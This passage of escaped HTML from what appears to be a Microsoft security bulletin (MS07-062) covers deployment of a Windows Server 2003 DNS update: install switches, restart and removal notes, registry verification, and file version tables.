If the file or version information is not present, use one of the other available methods to verify update installation.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;&lt;b&gt;Registry Key Verification&lt;/b&gt;&lt;/p&gt;&lt;p&gt;You may also be able to verify the files that this security update has installed by reviewing the registry keys listed in the &lt;b&gt;Reference Table&lt;/b&gt; in this section.&lt;/p&gt;&lt;p&gt;These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly when an administrator or an OEM integrates or slipstreams this security update into the Windows installation source files.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#ENOAC"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#ENOAC"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EOJAC"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EOJAC"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="E2IAE"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 2px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='4l2-E2IAE';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s4l2-E2IAE')"&gt;&lt;img id="is4l2-E2IAE" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h4&gt;&lt;a href="javascript:Toggle('s4l2-E2IAE')" style="text-decoration: none;"&gt;Microsoft Windows Server 2003 (all editions)&lt;/a&gt;&lt;/h4&gt;&lt;a href="javascript:Toggle('s4l2-E2IAE')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s4l2-E2IAE"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;&lt;b&gt;Reference Table&lt;/b&gt;&lt;/p&gt;&lt;p&gt;The following table contains the security update information for this software. You can find additional information in the subsection, &lt;b&gt;Deployment Information&lt;/b&gt;, in this section.&lt;/p&gt;&lt;table class="dataTable" id="EGJAE" cellpadding="0" cellspacing="0" width="91%"&gt;&lt;thead&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Inclusion in Future Service Packs&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;The update for this issue may be included in a future update rollup&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Deployment&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt; &lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Installing without user intervention&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p&gt;For all supported 32-bit editions of Windows Server 2003:&lt;/p&gt;&lt;p&gt;Windowsserver2003-kb941672-x86-enu /quiet&lt;/p&gt;&lt;p&gt;For all supported Itanium-based editions of Windows Server 2003:&lt;/p&gt;&lt;p&gt;WindowsServer2003-KB941672-ia64-enu /quiet&lt;/p&gt;&lt;p&gt;For all supported x64-based editions of Windows Server 2003:&lt;/p&gt;&lt;p&gt;WindowsServer2003.WindowsXP-KB941672-x64-enu /quiet&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Installing without restarting&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p&gt;For all supported 32-bit editions of Windows Server 2003:&lt;/p&gt;&lt;p&gt;Windowsserver2003-kb941672-x86-enu /norestart&lt;/p&gt;&lt;p&gt;For all supported Itanium-based editions of Windows Server 2003:&lt;/p&gt;&lt;p&gt;WindowsServer2003-KB941672-ia64-enu /norestart&lt;/p&gt;&lt;p&gt;For all supported x64-based editions of Windows Server 2003:&lt;/p&gt;&lt;p&gt;WindowsServer2003.WindowsXP-KB941672-x64-enu /norestart&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Further information&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;See the subsection, &lt;b&gt;Microsoft Detection and Deployment Tools and Guidance&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Update Log File&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;KB941672.log&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Restart Requirement&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt; &lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Restart required&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Yes, you must restart your system after you apply this security update. See &lt;b&gt;Restart Note&lt;/b&gt; below for more information.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Hotpatching&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;This security update does not support HotPatching. For more information about HotPatching see &lt;a href="http://support.microsoft.com/kb/897341"&gt;Microsoft Knowledge Base Article 897341&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Removal Information&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p&gt;For all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:&lt;/p&gt;&lt;p&gt;Use Add or Remove Programs tool in Control Panel or the Spuninst.exe utility located in the Use the Spuninst.exe utility, located in the %Windir%\$NTUninstallKB941672$\Spuninst folder&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;File Information&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;See the next subsection, &lt;b&gt;File Information&lt;/b&gt; for the full file manifest&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Registry Key Verification&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p&gt;For all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003:&lt;/p&gt;&lt;p&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP3\KB941672\Filelist&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;Restart Note: &lt;/b&gt;A system restart can be avoided for Windows Server 2003 by stopping the DNS service, installing the update, and then restarting the DNS service. If the DNS service is not stopped before installing the update, then a system restart will still be required.&lt;/p&gt;&lt;a name="EYMAE"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 2px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='4l3-EYMAE';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s4l3-EYMAE')"&gt;&lt;img id="is4l3-EYMAE" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h5&gt;&lt;a href="javascript:Toggle('s4l3-EYMAE')" style="text-decoration: none;"&gt;File Information&lt;/a&gt;&lt;/h5&gt;&lt;a href="javascript:Toggle('s4l3-EYMAE')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s4l3-EYMAE"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;The English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the &lt;b&gt;Time Zone&lt;/b&gt; tab in the Date and Time tool in Control Panel.&lt;/p&gt;&lt;p&gt;For all supported 32-bit editions of Windows Server 2003:&lt;/p&gt;&lt;table class="dataTable" id="EBNAE" cellpadding="0" cellspacing="0" width="91%"&gt;&lt;thead&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colEENAE" width="20%"&gt;File Name&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEINAE" width="20%"&gt;Version&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEMNAE" width="20%"&gt;Date&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEQNAE" width="11%"&gt;Time&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEUNAE" width="13%"&gt;Size&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEYNAE" style="border-right: 1px solid rgb(204, 204, 204);" width="13%"&gt;Folder&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.3027&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;16-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17:27&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;444,928&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1GDR&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.3027&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;16-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;19:05&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;445,440&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;w03a2409.dll&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.2957&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18-Jun-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;11:31&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;28,672&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.4171&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;16-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17:52&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;445,440&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP2GDR&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.4171&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;16-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;21:20&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;445,952&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP2QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;w03a2409.dll&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.4106&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;28-Jun-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;14:33&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;453,632&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP2QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;For all supported x64-based editions of Windows Server 2003:&lt;/p&gt;&lt;table class="dataTable" id="EMQAE" cellpadding="0" cellspacing="0" width="87%"&gt;&lt;thead&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colEPQAE" width="18%"&gt;File Name&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colETQAE" width="14%"&gt;Version&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEXQAE" width="18%"&gt;Date&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colE2QAE" width="9%"&gt;Time&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colE6QAE" width="13%"&gt;Size&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEDRAE" width="9%"&gt;CPU&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEHRAE" style="border-right: 1px solid rgb(204, 204, 204);" width="15%"&gt;Folder&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.3027&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:02&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;763,392&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1GDR&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;wdns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.3027&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:02&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;444,928&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X86&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1GDR\wow&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.3027&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:03&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;765,440&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;w03a2409.dll&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.2957&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:03&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;29,184&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;wdns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.3027&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:03&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;445,440&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X86&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1QFE\wow&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;ww03a2409.dll&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.2957&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:03&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;28,672&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X86&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1QFE\wow&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.4171&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:10&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;764,416&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP2GDR&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.4171&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:02&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;765,952&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP2QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;w03a2409.dll&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.4082&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:02&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;454,144&lt;/p&gt;&lt;br 